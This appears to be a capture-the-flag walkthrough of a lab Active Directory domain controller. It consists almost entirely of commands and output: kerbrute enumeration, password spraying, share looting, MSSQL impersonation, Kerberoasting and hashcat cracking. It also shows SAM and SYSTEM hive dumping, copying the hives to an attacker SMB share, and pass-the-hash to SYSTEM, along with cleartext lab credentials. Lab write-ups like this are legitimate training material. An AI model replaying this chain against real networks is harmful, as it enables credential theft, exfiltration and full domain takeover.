Foothold
$ kerbrute userenum -d hokkaido-aerospace.com ~/opt/Top_50_Female_Firstnames.Surname.txt --dc dc.hokkaido-aerospace.com
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 08/25/24 - Ronnie Flathers @ropnop
2024/08/25 07:00:06 > Using KDC(s):
2024/08/25 07:00:06 > dc.hokkaido-aerospace.com:88
2024/08/25 07:00:42 > [+] VALID USERNAME: GRACE.LEES@hokkaido-aerospace.com
2024/08/25 07:01:39 > [+] VALID USERNAME: MOLLY.SMITH@hokkaido-aerospace.com
2024/08/25 07:01:39 > [+] VALID USERNAME: MOLLY.EDWARDS@hokkaido-aerospace.com
2024/08/25 07:01:47 > [+] VALID USERNAME: HANNAH.O'NEILL@hokkaido-aerospace.com
2024/08/25 07:02:08 > Done! Tested 25000 usernames (4 valid) in 121.831 seconds
$ kerbrute userenum -d hokkaido-aerospace.com /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc dc.hokkaido-aerospace.com
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 08/25/24 - Ronnie Flathers @ropnop
2024/08/25 07:07:11 > Using KDC(s):
2024/08/25 07:07:11 > dc.hokkaido-aerospace.com:88
2024/08/25 07:07:16 > [+] VALID USERNAME: info@hokkaido-aerospace.com
2024/08/25 07:07:22 > [+] VALID USERNAME: administrator@hokkaido-aerospace.com
2024/08/25 07:07:28 > [+] VALID USERNAME: INFO@hokkaido-aerospace.com
2024/08/25 07:07:52 > [+] VALID USERNAME: Info@hokkaido-aerospace.com
2024/08/25 07:08:19 > [+] VALID USERNAME: discovery@hokkaido-aerospace.com
2024/08/25 07:08:23 > [+] VALID USERNAME: Administrator@hokkaido-aerospace.com
2024/08/25 07:19:13 > [+] VALID USERNAME: maintenance@hokkaido-aerospace.com
Grace.Lees
Molly.Smith
Molly.Edward
Hannah.O'Neill
Info
info
Discovery
discovery
Administrator$ netexec smb 192.168.193.40 -u users -p users --no-bruteforce --continue-on-success
SMB 192.168.193.40 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
SMB 192.168.193.40 445 DC [-] hokkaido-aerospace.com\Grace.Lees:Grace.Lees STATUS_LOGON_FAILURE
SMB 192.168.193.40 445 DC [-] hokkaido-aerospace.com\Molly.Smith:Molly.Smith STATUS_LOGON_FAILURE
SMB 192.168.193.40 445 DC [-] hokkaido-aerospace.com\Molly.Edward:Molly.Edward STATUS_LOGON_FAILURE
SMB 192.168.193.40 445 DC [-] hokkaido-aerospace.com\Hannah.O'Neill:Hannah.O'Neill STATUS_LOGON_FAILURE
SMB 192.168.193.40 445 DC [-] hokkaido-aerospace.com\Info:Info STATUS_LOGON_FAILURE
SMB 192.168.193.40 445 DC [+] hokkaido-aerospace.com\info:info
SMB 192.168.193.40 445 DC [-] hokkaido-aerospace.com\Discovery:Discovery STATUS_LOGON_FAILURE
SMB 192.168.193.40 445 DC [-] hokkaido-aerospace.com\discovery:discovery STATUS_LOGON_FAILURE
SMB 192.168.193.40 445 DC [-] hokkaido-aerospace.com\Administrator:Administrator STATUS_LOGON_FAILUREinfo:info$ netexec smb 192.168.193.40 -u info -p info --users
SMB 192.168.193.40 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
SMB 192.168.193.40 445 DC [+] hokkaido-aerospace.com\info:info
SMB 192.168.193.40 445 DC -Username- -Last PW Set- -BadPW- -Description-
SMB 192.168.193.40 445 DC Administrator 2023-12-06 15:56:28 4 Built-in account for administering the computer/domain
SMB 192.168.193.40 445 DC Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 192.168.193.40 445 DC krbtgt 2023-11-25 13:11:55 0 Key Distribution Center Service Account
SMB 192.168.193.40 445 DC Hazel.Green 2023-12-06 16:34:46 0
SMB 192.168.193.40 445 DC Molly.Smith 2023-11-25 13:34:13 5
SMB 192.168.193.40 445 DC Alexandra.Little 2023-11-25 13:34:13 0
SMB 192.168.193.40 445 DC Victor.Kelly 2023-11-25 13:34:17 0
SMB 192.168.193.40 445 DC Catherine.Knight 2023-11-25 13:34:17 0
SMB 192.168.193.40 445 DC Angela.Davies 2023-11-25 13:34:17 0
SMB 192.168.193.40 445 DC Molly.Edwards 2023-11-25 13:34:17 0
SMB 192.168.193.40 445 DC Tracy.Wood 2023-11-25 13:34:17 0
SMB 192.168.193.40 445 DC Lynne.Tyler 2023-11-25 13:34:17 0
SMB 192.168.193.40 445 DC Charlene.Wallace 2023-11-25 13:34:17 0
SMB 192.168.193.40 445 DC Cheryl.Singh 2023-11-25 13:34:17 0
SMB 192.168.193.40 445 DC Sian.Gordon 2023-11-25 13:34:17 0
SMB 192.168.193.40 445 DC Gordon.Brown 2023-11-25 13:34:17 0
SMB 192.168.193.40 445 DC Irene.Dean 2023-11-25 13:34:17 0
SMB 192.168.193.40 445 DC Anthony.Anderson 2023-11-25 13:34:17 0
SMB 192.168.193.40 445 DC Julian.Davies 2023-11-25 13:34:17 0
SMB 192.168.193.40 445 DC Hannah.O'Neill 2023-11-25 13:34:18 5
SMB 192.168.193.40 445 DC Rachel.Jones 2023-11-25 13:34:18 0
SMB 192.168.193.40 445 DC Declan.Woodward 2023-11-25 13:34:18 0
SMB 192.168.193.40 445 DC Annette.Buckley 2023-11-25 13:34:18 0
SMB 192.168.193.40 445 DC Elliott.Jones 2023-11-25 13:34:18 0
SMB 192.168.193.40 445 DC Grace.Lees 2023-11-25 13:34:18 5
SMB 192.168.193.40 445 DC Deborah.Francis 2023-11-25 13:34:18 0
SMB 192.168.193.40 445 DC Bruce.Cartwright 2023-11-25 13:34:21 0
SMB 192.168.193.40 445 DC Nigel.Brown 2023-11-25 13:34:21 0
SMB 192.168.193.40 445 DC Derek.Wyatt 2023-11-25 13:34:21 0
SMB 192.168.193.40 445 DC discovery 2023-12-06 15:42:56 4
SMB 192.168.193.40 445 DC maintenance 2023-11-25 13:39:04 0
SMB 192.168.193.40 445 DC hrapp-service 2023-11-25 14:14:40 0
SMB 192.168.193.40 445 DC info 2023-12-06 15:43:50 0 $ netexec smb 192.168.193.40 -u info -p info --shares
SMB 192.168.193.40 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
SMB 192.168.193.40 445 DC [+] hokkaido-aerospace.com\info:info
SMB 192.168.193.40 445 DC [*] Enumerated shares
SMB 192.168.193.40 445 DC Share Permissions Remark
SMB 192.168.193.40 445 DC ----- ----------- ------
SMB 192.168.193.40 445 DC ADMIN$ Remote Admin
SMB 192.168.193.40 445 DC C$ Default share
SMB 192.168.193.40 445 DC homes READ,WRITE user homes
SMB 192.168.193.40 445 DC IPC$ READ Remote IPC
SMB 192.168.193.40 445 DC NETLOGON READ Logon server share
SMB 192.168.193.40 445 DC SYSVOL READ Logon server share
SMB 192.168.193.40 445 DC UpdateServicesPackages READ A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
SMB 192.168.193.40 445 DC WsusContent READ A network share to be used by Local Publishing to place published content on this WSUS system.
SMB 192.168.193.40 445 DC WSUSTemp A network share used by Local Publishing from a Remote WSUS Console Instance.
$ netexec smb 192.168.193.40 -u info -p info -M spider_plus
SMB 192.168.193.40 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:hokkaido-aerospace.com) (signing:True) (SMBv1:False)
SMB 192.168.193.40 445 DC [+] hokkaido-aerospace.com\info:info
SPIDER_PLUS 192.168.193.40 445 DC [*] Started module spidering_plus with the following options:
SPIDER_PLUS 192.168.193.40 445 DC [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 192.168.193.40 445 DC [*] STATS_FLAG: True
SPIDER_PLUS 192.168.193.40 445 DC [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 192.168.193.40 445 DC [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 192.168.193.40 445 DC [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 192.168.193.40 445 DC [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 192.168.193.40 445 DC [*] Enumerated shares
SMB 192.168.193.40 445 DC Share Permissions Remark
SMB 192.168.193.40 445 DC ----- ----------- ------
SMB 192.168.193.40 445 DC ADMIN$ Remote Admin
SMB 192.168.193.40 445 DC C$ Default share
SMB 192.168.193.40 445 DC homes READ,WRITE user homes
SMB 192.168.193.40 445 DC IPC$ READ Remote IPC
SMB 192.168.193.40 445 DC NETLOGON READ Logon server share
SMB 192.168.193.40 445 DC SYSVOL READ Logon server share
SMB 192.168.193.40 445 DC UpdateServicesPackages READ A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
SMB 192.168.193.40 445 DC WsusContent READ A network share to be used by Local Publishing to place published content on this WSUS system.
SMB 192.168.193.40 445 DC WSUSTemp A network share used by Local Publishing from a Remote WSUS Console Instance.
SPIDER_PLUS 192.168.193.40 445 DC [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/192.168.193.40.json".
SPIDER_PLUS 192.168.193.40 445 DC [*] SMB Shares: 9 (ADMIN$, C$, homes, IPC$, NETLOGON, SYSVOL, UpdateServicesPackages, WsusContent, WSUSTemp)
SPIDER_PLUS 192.168.193.40 445 DC [*] SMB Readable Shares: 6 (homes, IPC$, NETLOGON, SYSVOL, UpdateServicesPackages, WsusContent)
SPIDER_PLUS 192.168.193.40 445 DC [*] SMB Writable Shares: 1 (homes)
SPIDER_PLUS 192.168.193.40 445 DC [*] SMB Filtered Shares: 1
SPIDER_PLUS 192.168.193.40 445 DC [*] Total folders found: 44
SPIDER_PLUS 192.168.193.40 445 DC [*] Total files found: 8
SPIDER_PLUS 192.168.193.40 445 DC [*] File size average: 1.21 KB
SPIDER_PLUS 192.168.193.40 445 DC [*] File size min: 0 B
SPIDER_PLUS 192.168.193.40 445 DC [*] File size max: 5.8 KB
$ smbclient '\\192.168.193.40\NETLOGON' -U info%info
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 25 07:40:08 2023
.. D 0 Sat Nov 25 07:17:33 2023
temp D 0 Wed Dec 6 09:44:26 2023
7699711 blocks of size 4096. 1862906 blocks available
smb: \> cd temp
smb: \temp\> ls
. D 0 Wed Dec 6 09:44:26 2023
.. D 0 Sat Nov 25 07:40:08 2023
password_reset.txt A 27 Sat Nov 25 07:40:29 2023
7699711 blocks of size 4096. 1862906 blocks available
smb: \temp\> mget password_reset.txt
Get file password_reset.txt? y
getting file \temp\password_reset.txt of size 27 as password_reset.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \temp\> exit
discovery:Start123!$ impacket-GetUserSPNs hokkaido-aerospace.com/info:'info' -dc-ip 192.168.193.40 -requestHash uncrackable
$ impacket-mssqlclient hokkaido-aerospace.com/discovery:'Start123!'@192.168.193.40 -windows-auth
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (HAERO\discovery guest@master)> SQL (HAERO\discovery guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- -------------- --------------
b'LOGIN' b'' IMPERSONATE GRANT HAERO\services hrappdb-reader SQL (hrappdb-reader hrappdb-reader@hrappdb)> select * from hrappdb.information_schema.tables;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
hrappdb dbo sysauth b'BASE TABLE'
hrapp-service:Untimed$Runny$ bloodhound-python -d hokkaido-aerospace.com -u hrapp-service -p 'Untimed$Runny' -ns 192.168.193.40 -c all
INFO: Found AD domain: hokkaido-aerospace.com
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.hokkaido-aerospace.com
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.hokkaido-aerospace.com
INFO: Found 34 users
INFO: Found 62 groups
INFO: Found 2 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer: dc.hokkaido-aerospace.com
INFO: Done in 00M 10S
$ python targetedKerberoast.py -v -d hokkaido-aerospace.com -u hrapp-service -p 'Untimed$Runny'$ hashcat -m 13100 hazel.hash ~/rockyou.txt -Ohazel.green:haze1988Password reset
$ rdesktop -u molly.smith -p 'Pwned123!' -d hokkaido-aerospace.com 192.168.193.40 Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Users\molly.smith> whoami
haero\molly.smith
PS C:\Users\molly.smith> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::ffd:7d4d:cb9f:8ac%6
IPv4 Address. . . . . . . . . . . : 192.168.193.40
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.193.254
PS C:\Users\molly.smith> type C:\local.txt
04659bc80b4e3d55e4ead4cfc2417113
PS C:\Users\molly.smith>PS C:\Windows\system32> reg save hklm\sam c:\programdata\sam
The operation completed successfully.
PS C:\Windows\system32> reg save hklm\system c:\programdata\system
The operation completed successfully.$ impacket-smbserver share share/ -smb2support -username adot -password adotPS C:\programdata> net use A: \\192.168.45.233\share
Enter the user name for '192.168.45.233': adot
Enter the password for 192.168.45.233:
The command completed successfully.
PS C:\programdata> move sam A:
PS C:\programdata> move system A:$ impacket-smbexec Administrator@192.168.193.40 -hashes :d752482897d54e239376fddb2a2109e4
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
711bd85182a76970c9e738ff14598685
C:\Windows\system32>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::ece8:e6da:6712:f805%6
IPv4 Address. . . . . . . . . . . : 192.168.193.40
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.193.254Last updated
